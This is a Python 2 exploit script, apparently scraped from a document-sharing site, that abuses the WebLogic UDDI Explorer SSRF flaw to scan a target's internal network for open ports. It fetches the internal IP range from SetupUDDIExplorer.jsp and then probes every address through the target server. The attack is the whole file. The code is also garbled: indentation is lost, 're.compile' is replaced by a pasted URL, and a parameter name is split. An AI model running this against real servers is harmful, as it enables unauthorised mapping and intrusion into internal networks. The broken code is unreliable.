#!/usr/bin/env python
# coding: utf-8
import argparse
import thread
import time
import re
import requests
'Weblogic SSRF 扫描内网IP开放端口'
def ite_ip(ip):
for i in range(1, 256):
final_ip = '{ip}.{i}'.format(ip=ip, i=i)
thread.start_new_thread(scan, (final_ip,))
time.sleep(3)
def scan(final_ip):
ports = ('21', '22', '23', '53', '80', '135', '139', '443', '445', '1080', '1433', '1521', '3306', '3389', '4899', '8080', '7001', '8000')
for port in ports:
vul_url = args.url + '/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchna me=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search' % (final_ip, port)
try:
r = requests.get(vul_url, timeout=15, verify=False)
result1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException', r.content)
result2 = re.findall('but could not connect', r.content)
if len(result1) != 0 and len(result2) == 0:
print final_ip + ':' + port
except Exception, e:
pass
def get_ip():
vul_url = args.url + '/uddiexplorer/SetupUDDIExplorer.jsp'
r = requests.get(vul_url, timeout=15, verify=False)
reg = https://www.wendangku.net/doc/9416137502.html,pile(r"For example: http://\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\ b")
result1 = reg.findall(r.content)
result = ""
if result1:
result = result1[0].replace("For example: http://","")
return result
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Weblogic SSRF vulnerable exploit') parser.add_argument('--url', dest='url', required=True, help='Target url')
# parser.add_argument('--ip', dest='scan_ip', help='IP to scan')
args = parser.parse_args()
# ip = '.'.join(args.scan_ip.split('.')[:-1])
ip = get_ip()
if ip:
ite_ip(ip)
else:
print "no ip"